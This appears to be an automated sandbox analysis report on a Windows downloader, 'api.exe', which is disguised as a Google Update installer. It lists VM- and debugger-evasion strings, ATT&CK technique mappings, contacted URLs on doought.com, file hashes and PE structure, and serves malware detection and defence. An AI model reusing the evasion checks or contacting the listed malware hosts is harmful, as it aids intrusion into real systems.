Source: api.exe	Binary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/STRING TOO LONGVECTOR<T> TOO LONGGETTRUEQEMU-GA.EXESOFTWARE\VMWARE, INC.\VMWARE TOOLSCHECKING REG KEY %S HARDWARE\DEVICEMAP\SCSI\SCSI PORT 0\SCSI BUS 0\TARGET ID 0\LOGICAL UNIT ID 0IDENTIFIERVMWARECHECKING REG KEY %SHARDWARE\ACPI\DSDT\VBOX__ANANDAMARGASOFTWARE\ANANDAMARGA\

Source: C:\Users\user\Desktop\api.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier

Source: C:\Users\user\Desktop\api.exe TID: 6068

Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F398DE FindFirstFileExW,

Source: api.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: api.exe	Binary or memory string: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/string too longvector<T> too longGETtrueqemu-ga.exeSOFTWARE\VMware, Inc.\VMware ToolsChecking reg key %s HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0IdentifierVMWAREChecking reg key %sHARDWARE\ACPI\DSDT\VBOX__anandamargaSoftware\anandamarga\
Source: WerFault.exe, 00000004.00000002.653175200.0000000005050000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: api.exe	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: api.exe	Binary or memory string: qemu-ga.exe
Source: WerFault.exe, 00000004.00000002.652588339.00000000034D3000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: api.exe	Binary or memory string: VMWARE
Source: api.exe, 00000000.00000003.632707342.0000000000874000.00000004.00000001.sdmp	Binary or memory string: \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware ToolsntVersion\Windowsializeution Options\Registry\Mach\Regist\REGISTRY\MACHINE\\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Toolsu
Source: WerFault.exe, 00000004.00000002.653175200.0000000005050000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: WerFault.exe, 00000004.00000002.653175200.0000000005050000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: WerFault.exe, 00000004.00000002.653175200.0000000005050000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\api.exe

Process information queried: ProcessInformation

Source: C:\Users\user\Desktop\api.exe	Process queried: DebugPort
Source: C:\Users\user\Desktop\api.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F2ABC7 LdrInitializeThunk,

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F2B0A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

Source: C:\Users\user\Desktop\api.exe

Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F3794B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F31BEB mov eax, dword ptr fs:[00000030h]

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F21A90 GetProcessHeap,HeapFree,

Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2B23C SetUnhandledExceptionFilter,
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2B0A9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F31821 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Users\user\Desktop\api.exe	Code function: 0_2_00F2B472 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F2AF02 cpuid

Source: C:\Users\user\Desktop\api.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\api.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\api.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
Source: C:\Users\user\Desktop\api.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\api.exe	Code function: GetLocaleInfoW,
Source: C:\Users\user\Desktop\api.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
Source: C:\Users\user\Desktop\api.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
Source: C:\Users\user\Desktop\api.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\api.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\api.exe	Code function: EnumSystemLocalesW,
Source: C:\Users\user\Desktop\api.exe	Code function: EnumSystemLocalesW,

Source: C:\Users\user\Desktop\api.exe

Code function: 0_2_00F39393 GetSystemTimeAsFileTime,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter3	Application Shimming1	Process Injection1	Virtualization/Sandbox Evasion13	OS Credential Dumping	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Boot or Logon Initialization Scripts	Application Shimming1	Process Injection1	LSASS Memory	Security Software Discovery341	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion13	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol2	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery22	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
api.exe	44%	Virustotal		Browse
api.exe	34%	ReversingLabs	Win32.Downloader.Satacom
api.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://doought.com/hit.php?a=%7BbWW0uZJNBoadTsmEUEzhG%7Did=29	0%	Avira URL Cloud	safe
http://doought.com/evreigate.php	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
doought.com	104.21.18.167	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://doought.com/hit.php?a=%7BbWW0uZJNBoadTsmEUEzhG%7Did=29	false	Avira URL Cloud: safe	unknown
http://doought.com/evreigate.php	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.18.167	doought.com	United States		13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	371964
Start date:	19.03.2021
Start time:	12:41:08
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 5s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	api.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.evad.winEXE@2/4@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.1% (good quality ratio 2.1%) Quality average: 78% Quality standard deviation: 16.4%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Sleeps bigger than 120000ms are automatically reduced to 1000ms Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 104.42.151.234, 40.88.32.150, 13.88.21.125, 20.50.102.62, 13.64.90.137, 104.43.193.48, 52.155.217.156, 20.54.26.129, 2.20.142.209, 2.20.142.210, 92.122.213.247, 92.122.213.194 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	api.exe	Get hash	malicious	Browse	172.67.182.193
	APCDOn0lEH.dll	Get hash	malicious	Browse	104.20.185.68
	qzinl7qkwD.exe	Get hash	malicious	Browse	104.21.79.24
	z2xQEFs54b.exe	Get hash	malicious	Browse	172.67.128.139
	qzinl7qkwD.exe	Get hash	malicious	Browse	172.67.188.8
	photoloader.dll	Get hash	malicious	Browse	104.20.184.68
	YpyXT7Tnik.exe	Get hash	malicious	Browse	104.16.154.36
	Direcci#U00f3n de Impuestos y Aduanas Nacionales.vbs	Get hash	malicious	Browse	172.67.219.133
	#Ud83d#Udd0aAudio997.wavv-copy.html	Get hash	malicious	Browse	172.67.214.111
	Invoice inv47921168.html	Get hash	malicious	Browse	104.16.18.94
	PiS1Flv8Al.exe	Get hash	malicious	Browse	104.17.62.50
	p0Qhewg73f.exe	Get hash	malicious	Browse	104.17.63.50
	b9uMEI1qOT.dll	Get hash	malicious	Browse	104.20.184.68
	wPi28FOPae.exe	Get hash	malicious	Browse	172.67.83.132
	YeTkeRWSot.exe	Get hash	malicious	Browse	172.67.219.133
	tbJ6MFpyVX.exe	Get hash	malicious	Browse	172.67.83.132
	Q1FqODCZV6.exe	Get hash	malicious	Browse	104.17.63.50
	PT5vcWvTNr.exe	Get hash	malicious	Browse	172.67.219.133
	Purchase Order19321.doc	Get hash	malicious	Browse	172.67.207.35
	SecuriteInfo.com.Trojan.Win32.Save.a.8501.exe	Get hash	malicious	Browse	104.21.22.219

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_api.exe_bde7d97b705cee582afe7bb6c85cb3aacec1b52_3f83328d_0bfdd03f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	11562
Entropy (8bit):	3.7678449578832627
Encrypted:	false
SSDEEP:	96:sPf25BnA8vHfxIwY9oIaq9NfPpXIQcQvc6QcEDMcw3DhCm+HbHgnoW6HeonsFEJU:ymDHiHBUZMXojGHk/u7s8AS274Itlu
MD5:	9DFE6E12F4E345DFA71F88D88EC81F3B
SHA1:	D681D157507A56E337A87D50A374E0B79CCFA8B4
SHA-256:	09BD649738D81ECBD09F318666BEA5774017D116FF919EC44046C5AC74E04381
SHA-512:	895332C54DF5D71ADE583EBC959580DDAE021A0AAAB059C5CDCCE9641DB5BF8AD752AD15985042E135884D306C80E4A781B8A70AF4241E4B5C6E33CD2A0C7734
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.0.6.2.7.7.1.3.1.5.4.9.5.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.0.6.2.7.7.1.6.9.9.8.6.8.7.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.b.f.0.1.c.-.1.5.1.c.-.4.3.b.5.-.b.3.f.1.-.4.c.8.c.c.7.d.2.5.2.c.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.c.a.3.2.2.7.-.e.a.0.6.-.4.0.5.3.-.b.c.c.c.-.c.6.c.b.2.5.b.a.2.3.6.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.a.p.i...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.G.o.o.g.l.e.U.p.d.a.t.e.S.e.t.u.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.c.-.0.0.0.1.-.0.0.1.b.-.c.0.a.f.-.f.e.d.8.b.4.1.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.5.b.2.5.b.e.0.2.8.7.c.2.7.f.7.e.9.5.2.f.e.7.9.9.7.2.0.6.3.5.6.0.0.0.0.0.9.0.4.!.0.0.0.0.3.d.6.4.a.b.b.c.5.3.3.0.2.1.e.b.4.6.a.8.6.0.d.1.3.f.8.4.6.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBBBD.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Mar 19 11:41:54 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	78320
Entropy (8bit):	1.89753116343559
Encrypted:	false
SSDEEP:	192:E5d++19UFDMajulPCBuFYGQXUnIYzz6PPXgObLmPw353bseOuW6GZ1n7RAFXnTMT:61qgFYBPXXmPwhOuEoXIpB
MD5:	0AF7D16EECCF0618459F06B6353C9EB3
SHA1:	B3C4EBBA0F717E38DF9216904A93C9FC7E012C57
SHA-256:	14BA2CE896028777D4557F378B419F663330A8C3702CA21F5692BD423F7D09EF
SHA-512:	579695B40C8AA0B3EF6816D12BF7CDE639B3B0C139962A7C28BAFE4A8F737251E53135A640CCE68F66FF8B88E080D8D93D1E607130EAFD77E22130382B6DF4C1
Malicious:	false
Reputation:	low
Preview:	MDMP....... .........T`...................U...........B......h.......GenuineIntelW...........T.............T`.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERBFD5.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8264
Entropy (8bit):	3.69548014548556
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiGF6To16YrHSU6+BgmfKSd+pru89b0xsft8m:RrlsNiU6To16YLSU6+BgmfKS+0qfD
MD5:	50654062BFCAD9BEE074DD2AACEFDC65
SHA1:	0BDB7C67744C4A66CFCAA23FDE121823A822CA5F
SHA-256:	F47A08952BC147703C771ABE04771AA18397D210D0F68D75938ABE546E1A34F6
SHA-512:	59E829E89D9F7C24B2C77204650E73C75DFF07B243700C6F77245A0044E36579178AD14FC5146CC69F9F45D1677A1EBD47FC9A8BCC7F3299C8DB5A9C0831E2D6
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WERC19B.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4602
Entropy (8bit):	4.43980057180413
Encrypted:	false
SSDEEP:	48:cvIwSD8zsYJgtWI9Rj9WSC8Bg8fm8M4JQ3FUL+q8iejDDTg0d:uITfeeMSNzJ3mjvM0d
MD5:	EEF75C94B6B3925D9C71E57F02E6A7CE
SHA1:	1674FE0F30761DECF8BE045E057C94ACCAA89652
SHA-256:	9E814112D51D21516C65E1BF6A3FB3251FCAAA9200BB0CFD8E13464244243CAD
SHA-512:	D047794F284096533DFB57766C969750F8179A4C2A031872F075A610AFDC9097187859CC03EF508C66A5D4A7A3A83981761FE26A68CE706927B6A491848E77B7
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="908452" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.935954826556636
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	api.exe
File size:	2071040
MD5:	b63932cde2143b739551fa5501394146
SHA1:	3d64abbc533021eb46a860d13f8465d2e448fcd3
SHA256:	c592d92f14fd97f4f4b29a3c71ec2a119d4cf5df4750f76fc455e1f82bc8b798
SHA512:	f69185b41c3e7657ebfc8653aa4222dd2ae3c047d989f45d92f428ac212d7a1116a6f1a9cfecf61f894c69ba0e4caeb847dc71510909859a2927f32a82c75a93
SSDEEP:	49152:noT1j3FsVjlgHnPcN/45z7p9PgYGG8BQBCqnNKxTmORI/CaX+ijHFPPP:noT1bpcO5F8eC+NkBRGXLjH9PP
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8.q.\|...\|...\|...'...q...'.......'...j...'...}.......3.......m.......e...'...o...\|.......}...u...}...}...}...}...Rich\|..........

File Icon


Icon Hash:	6863eee6b292c6ee

Static PE Info

General
Entrypoint:	0x40ae2b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x6054676F [Fri Mar 19 08:57:19 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	212ad670c01686a5b7fce94f52bc41d1

Entrypoint Preview

Instruction
call 00007F046C8593C2h
jmp 00007F046C858D1Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F046C850912h
mov dword ptr [esi], 00425340h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00425348h
mov dword ptr [ecx], 00425340h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F046C8508DFh
mov dword ptr [esi], 0042535Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 00425364h
mov dword ptr [ecx], 0042535Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 00425334h
push eax
call 00007F046C85AC18h
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F046C858EACh
push 0000000Ch
push esi
call 00007F046C858ACCh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F046C858E1Fh
push 00433C24h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F046C85ADFFh
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F046C858E35h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x343a4	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x37000	0x132246	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x16a000	0x228c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x32370	0x70	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x32484	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x323e0	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x25000	0x1c0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x23ce8	0x23e00	False	0.558042519599	data	6.64138021056	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x25000	0xfdb6	0xfe00	False	0.518531619094	data	5.70182022829	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x35000	0x1f68	0x1200	False	0.182074652778	DOS executable (block device driver \277DN)	3.01785095247	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x37000	0x132246	0x132400	False	0.982848373724	data	7.9869015532	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x16a000	0x228c	0x2400	False	0.7314453125	data	6.6640906817	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
B	0x37828	0x12a154	LZMA compressed data, non-streamed, size 8381306
GOOGLEUPDATE	0x16197c	0x4	data
RT_ICON	0x161980	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x161aa8	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x162010	0x2e8	data	English	United States
RT_ICON	0x1622f8	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 8816262, next used block 9868950	English	United States
RT_ICON	0x162ba0	0x668	dBase IV DBT of `.DBF, block length 1536, next free block index 40, next free block 224, next used block 65281	English	United States
RT_ICON	0x163208	0xea8	data	English	United States
RT_STRING	0x1640b0	0x12a	data	Arabic	Saudi Arabia
RT_STRING	0x1641dc	0x196	data	Bulgarian	Bulgaria
RT_STRING	0x164374	0x182	data	Catalan	Spain
RT_STRING	0x1644f8	0xb8	data	Chinese	Taiwan
RT_STRING	0x1645b0	0x176	data	Czech	Czech Republic
RT_STRING	0x164728	0x146	data	Danish	Denmark
RT_STRING	0x164870	0x156	data	German	Germany
RT_STRING	0x1649c8	0x19c	data	Greek	Greece
RT_STRING	0x164b64	0x120	data	English	United States
RT_STRING	0x164c84	0x174	data	Finnish	Finland
RT_STRING	0x164df8	0x1ac	data	French	France
RT_STRING	0x164fa4	0x12e	data	Hebrew	Israel
RT_STRING	0x1650d4	0x150	data	Hungarian	Hungary
RT_STRING	0x165224	0x13c	data	Icelandic	Iceland
RT_STRING	0x165360	0x19c	data	Italian	Italy
RT_STRING	0x1654fc	0xea	data	Japanese	Japan
RT_STRING	0x1655e8	0xde	data	Korean	North Korea
RT_STRING	0x1655e8	0xde	data	Korean	South Korea
